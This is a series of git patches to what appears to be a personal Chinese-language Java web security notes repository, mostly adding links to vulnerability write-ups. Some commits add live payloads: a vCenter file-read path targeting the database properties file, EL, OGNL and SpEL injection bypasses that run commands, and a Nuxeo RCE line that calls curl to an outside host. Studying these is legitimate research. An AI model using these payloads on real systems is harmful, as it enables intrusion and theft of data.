vCenter漏洞实战利用总结](https://mp.weixin.qq.com/s/0gg5TDEtL3lCb9pOnm42gg) + +[Vcenter实战利用方式总结](https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247499057&idx=1&sn=24ce83c75152529f2b8ef8543162a734&chksm=cfa55922f8d2d0349b97211fdf45df6c78b26ace580b68579817ed67760aaface17348529cf3&mpshare=1&scene=23&srcid=10245pAGxEFHmXFGCMoKjGdB&sharer_sharetime=1666572610152&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 38258217a9f8a82cb920cd2651f1555c15e71add Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 24 Oct 2022 17:03:42 +0800 Subject: [PATCH 164/332] Update Readme.md --- VMware vCenter/Readme.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/VMware vCenter/Readme.md b/VMware vCenter/Readme.md index f8ff54d..a4ff167 100644 --- a/VMware vCenter/Readme.md +++ b/VMware vCenter/Readme.md @@ -6,6 +6,15 @@ /sdk/vimServiceVersions.xml ``` +### VMware vCenter Server 任意文件读取漏洞 + +[VMware vCenter Server 任意文件读取漏洞](https://forum.90sec.com/t/topic/1582) + +endpoint +``` +/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties +``` + ### CVE-2021-21972 [VMware vCenter RCE 漏洞踩坑实录——一个简单的RCE漏洞到底能挖出什么知识](https://mp.weixin.qq.com/s/eamNsLY0uKHXtUw_fiUYxQ) From 5ea6357b701e922c155ffb8ade88fcfe2e395876 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 25 Oct 2022 09:35:12 +0800 Subject: [PATCH 165/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 514c97a..1549567 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -185,3 +185,4 @@ + 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect) + 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用** ++ 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh) From d39959ef08ef3f46dda521dad048bf4e5909dc5a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 25 Oct 2022 20:46:21 +0800 Subject: [PATCH 166/332] Update README.md --- Solr/README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Solr/README.md b/Solr/README.md index 38c86b8..cc7d06c 100644 --- a/Solr/README.md +++ b/Solr/README.md @@ -186,3 +186,6 @@ get = requests.get(burp0_url, headers=burp0_headers) print(get.text) ``` +## 任意文件删除 + +https://mp.weixin.qq.com/s/JXBiQR3q7ykITVFBwm_9Vg From 8b8e829bf050464a8b36ddf26841bed72dbb84aa Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 26 Oct 2022 11:39:18 +0800 Subject: [PATCH 167/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1549567..ff2b853 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -186,3 +186,4 @@ + 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect) + 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用** + 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh) ++ 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html) From 730d0c4ceadeb1cc92845254303c16c3dba8c317 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 26 Oct 2022 21:44:06 +0800 Subject: [PATCH 168/332] Create Readme.md --- apache storm/Readme.md | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 apache storm/Readme.md diff --git a/apache storm/Readme.md b/apache storm/Readme.md new file mode 100644 index 0000000..c269064 --- /dev/null +++ b/apache storm/Readme.md @@ -0,0 +1,21 @@ +# apache storm + +## 环境搭建 + +https://blog.51cto.com/u_13870740/3445168 + +https://github.com/heibaiying/BigData-Notes/blob/master/notes/installation/Storm%E5%8D%95%E6%9C%BA%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA.md + +``` +nohup bash storm dev-zookeeper & bash storm nimbus & bash storm supervisor &bash storm ui & bash storm logviewer & +``` + +## 漏洞分析 + +https://paper.seebug.org/1780/#0x03 + +https://blog.noah.360.net/apache-storm-vulnerability-analysis/ + +https://y4er.com/posts/apache-storm-two-cve/ + +**自己尝试反序列化并没有成功cb,环境是2.1.0** From 5bad93020461157ec8398cbcac82898febf3378d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 27 Oct 2022 14:19:26 +0800 Subject: [PATCH 169/332] Update Readme.md --- shell/EL/Readme.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/shell/EL/Readme.md b/shell/EL/Readme.md index 56f6390..66df221 100644 --- a/shell/EL/Readme.md +++ b/shell/EL/Readme.md @@ -39,3 +39,9 @@ ${''.class.forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInsta ``` **需要注意jdk版本问题可能没有bcel类** 理论上spel表达式可以用的payLoad 这里也可以利用 +## bypass + +https://forum.butian.net/share/1880 +```java +${""[param.a]()[param.b](param.c)[param.d]()[param.e](param.f)[param.g](param.h)} +``` From 9c0a916079cd1fcde6fd6b7ebfa50ff2ecd4d209 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 27 Oct 2022 20:42:56 +0800 Subject: [PATCH 170/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ff2b853..706832e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -187,3 +187,4 @@ + 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用** + 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh) + 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html) ++ 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ) From df7e01ec98e9fc65c8a1461a39acc71188918cac Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 29 Oct 2022 01:33:25 +0800 Subject: [PATCH 171/332] Create Readme.md --- wso2/Readme.md | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 wso2/Readme.md diff --git a/wso2/Readme.md b/wso2/Readme.md new file mode 100644 index 0000000..1e02983 --- /dev/null +++ b/wso2/Readme.md @@ -0,0 +1,25 @@ +# wso2 + +## CVE-2022-29464 + +### 文件上传 + +路径匹配处理类 + +![image](https://user-images.githubusercontent.com/63966847/198697817-2f3055f2-5918-4336-bf73-71e500a1050b.png) + +![image](https://user-images.githubusercontent.com/63966847/198697831-7aeb695f-b02d-4a77-a403-562a37b4245f.png) + +### fix + +1.加了权限认证 + +2.对上传文件的路径做校验 + +### 参考 + +https://github.com/wso2/carbon-kernel/pull/3152/commits/13795df0a5b6a2206fd0338abfff057a7b99e1bb + +https://docs.wso2.com/m/mobile.action#page/180952746 + +https://www.anquanke.com/post/id/273528?from=timeline From eb4ece311d40e5e7ee61cdeec8a51fba4d0aca5d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 29 Oct 2022 11:14:30 +0800 Subject: [PATCH 172/332] Update Readme.md --- shell/SPEL/Readme.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index b0acffd..9487637 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md @@ -110,6 +110,11 @@ print(')}') 其他bypass: https://xz.aliyun.com/t/9245 +## springboot回显 +``` +Java.type("org.springframework.web.context.request.RequestContextHolder").currentRequestAttributes().getResponse().addHeader("test",new java.lang.String(Java.type("sun.misc.IOUtils").readFully(new java.io.FileInputStream("/flag"),1024,false))); +``` + ## 参考 > https://xz.aliyun.com/t/9245 **可以使用#request.getRequestedSessionId() 或者 #request.getHeader('User-Agent') 反正可以使用request对象或者respose** > From 914df006509b353eae398034ef49839d3df8a4f0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 29 Oct 2022 11:34:43 +0800 Subject: [PATCH 173/332] Update Readme.md --- shell/OGNL/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/shell/OGNL/Readme.md b/shell/OGNL/Readme.md index 1c52c1b..b09dfcf 100644 --- a/shell/OGNL/Readme.md +++ b/shell/OGNL/Readme.md @@ -1,5 +1,7 @@ # OGNL bypass ```java +${@jdk.jshell.JShell@create().eval('java.lang.Runtime.getRuntime().exec("")} + new javax.script.ScriptEngineManager().getEngineByName("js").eval(此处的Payload可以进行unicode编码) new javax.script.ScriptEngineManager().getEngineByName("js").eval("new j\u0061va.lang.ProcessBuilder['(java.l\u0061ng.String[])'](['cmd.exe','/c','calc']).start()\u003B"); From bca87f5ed1a77de4ffb0b4474be893d412485607 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 29 Oct 2022 11:36:21 +0800 Subject: [PATCH 174/332] Update Readme.md --- shell/SPEL/Readme.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index 9487637..82b8808 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md @@ -83,7 +83,10 @@ T(java.nio.file.Files).write(T(java.nio.file.Paths).get(T(java.net.URI).create(" Nuxeo RCE ''['class'].forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(''['class'].forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),'curl 172.17.0.1:9898') - + +jdk9+ + +T(jdk.jshell.JShell).Methods[6].invoke(null,'').eval('xxxx'); ``` 字符串绕过 From 8ec5138ab18ade5003102b0fadc937aaf8ad021a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 30 Oct 2022 21:57:11 +0800 Subject: [PATCH 175/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 706832e..b25c00c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -188,3 +188,4 @@ + 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh) + 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html) + 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ) ++ 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/) From ef725d97fcc82ec08ec65de66b2eb8460ca49c47 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 1 Nov 2022 20:46:54 +0800 Subject: [PATCH 176/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b25c00c..7ce9d99 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -189,3 +189,4 @@ + 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html) + 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ) + 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/) ++ 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html) From 6443c0b76762056b6cf3892ebe727fd9aafd25b0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 2 Nov 2022 17:43:12 +0800 Subject: [PATCH 177/332] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index afcf094..e2e39f6 100644 --- a/README.md +++ b/README.md @@ -23,7 +23,7 @@ + 2022/01/16 [添加CAS漏洞学习](CAS) 💛 💙 💜 ❤️ 💚 + 2022/03/18 [添加Solr利用exp](Solr) 💛 💙 💜 ❤️ 💚 + 2022/10/07 [添加jvm的学习笔记](JVM) 💛 💙 💜 ❤️ 💚 -+ 2022/10/07 [添加JDK里面的trick](JDK) 💛 💙 💜 ❤️ 💚 ++ 2022/10/07 [添加JDK里面的trick](Jdk) 💛 💙 💜 ❤️ 💚 From ed0de079fba2b2ebbd62fcd7b614fed062fc40d1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 3 Nov 2022 17:18:16 +0800 Subject: [PATCH 178/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7ce9d99..fbe1161 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -190,3 +190,4 @@ + 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ) + 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/) + 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html) ++ 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ) From e686af6a063a976db62edd139ee49895e4458fc1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 6 Nov 2022 19:08:20 +0800 Subject: [PATCH 179/332] Update Readme.md --- "java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" index 63f06c2..34fce36 100644 --- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" +++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" @@ -28,3 +28,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了 + 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习** + 2022/10/22 [上传包可“绕过”Java过滤器的检查?](https://gv7.me/articles/2019/why-can-multipart-post-bypass-java-filter/) **遇到了post请求有waf可以试一试文件上传的方法传递参数** + 2022/10/22 [burpsuite保存现有数据包记录&导入之前的抓包记录](https://blog.csdn.net/Fly_hps/article/details/88854111) [148处XSS你如何提交给开发修复?](https://gv7.me/articles/2017/how-do-to-submit-148-xss-vulnerabilities/) **bp的保存数据** ++ 2022/11/06 [【干货分享】五分钟教你挖掘小程序漏洞](https://mp.weixin.qq.com/s/95YiN8XJLGPUS5ykBUsmAg【干货分享】五分钟教你挖掘小程序漏洞) **小程序挖掘** From dfcc57324dd22bee09bdfa5b42232ea4e5b40f69 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 6 Nov 2022 20:53:37 +0800 Subject: [PATCH 180/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index fbe1161..a138ee1 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -191,3 +191,4 @@ + 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/) + 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html) + 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ) ++ 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊 From 05dd9a6d4812c96a7f2a0a5efc813d4d2ecd1927 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 6 Nov 2022 21:29:45 +0800 Subject: [PATCH 181/332] Update Readme.md --- shell/EL/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/shell/EL/Readme.md b/shell/EL/Readme.md index 66df221..dfd1a79 100644 --- a/shell/EL/Readme.md +++ b/shell/EL/Readme.md @@ -45,3 +45,5 @@ https://forum.butian.net/share/1880 ```java ${""[param.a]()[param.b](param.c)[param.d]()[param.e](param.f)[param.g](param.h)} ``` + +https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html From 5b42040b3cdf4f8167f5a54026170aa85b8a4589 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 6 Nov 2022 21:31:46 +0800 Subject: [PATCH 182/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a138ee1..54be93c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -192,3 +192,4 @@ + 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html) + 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ) + 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊 ++ 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np** From 05d5ae707ee8744edd830bafc3ee2e7f10cdfb31 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 8 Nov 2022 00:15:20 +0800 Subject: [PATCH 183/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 54be93c..857b71e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -193,3 +193,4 @@ + 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ) + 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊 + 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np** ++ 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw) From cfff1e6afcf4ff447b456036ca4a445b6459b0a7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 9 Nov 2022 13:08:37 +0800 Subject: [PATCH 184/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 857b71e..cb6d354 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -194,3 +194,4 @@ + 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊 + 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np** + 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw) ++ 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件** From 98b3345681289c1b407d99630769741bc5b12221 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 9 Nov 2022 13:18:21 +0800 Subject: [PATCH 185/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index cb6d354..a119bff 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -195,3 +195,4 @@ + 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np** + 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw) + 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件** ++ 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From fafb5256e118e107cd4bce89a584e531465fb42a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 10 Nov 2022 16:15:53 +0800 Subject: [PATCH 186/332] Create CVE-2021-33037.md --- tomcat/Smuggling/CVE-2021-33037.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 tomcat/Smuggling/CVE-2021-33037.md diff --git a/tomcat/Smuggling/CVE-2021-33037.md b/tomcat/Smuggling/CVE-2021-33037.md new file mode 100644 index 0000000..7905c08 --- /dev/null +++ b/tomcat/Smuggling/CVE-2021-33037.md @@ -0,0 +1,4 @@ +Apache Tomcat HTTP请求走私(CVE-2021-33037)漏洞分析 + + +[Apache Tomcat HTTP请求走私(CVE-2021-33037)漏洞分析](https://xz.aliyun.com/t/9866) From 4c3c193f5a638d7a02dfbddc24cd0a7ea74a3cd7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 10 Nov 2022 21:43:42 +0800 Subject: [PATCH 187/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a119bff..6f37201 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -196,3 +196,4 @@ + 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw) + 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件** + 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true** From 55c1eb7eb95ba9523c46bef809589a2fa0deffcb Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 10 Nov 2022 21:47:47 +0800 Subject: [PATCH 188/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6f37201..f24bd56 100644 --- 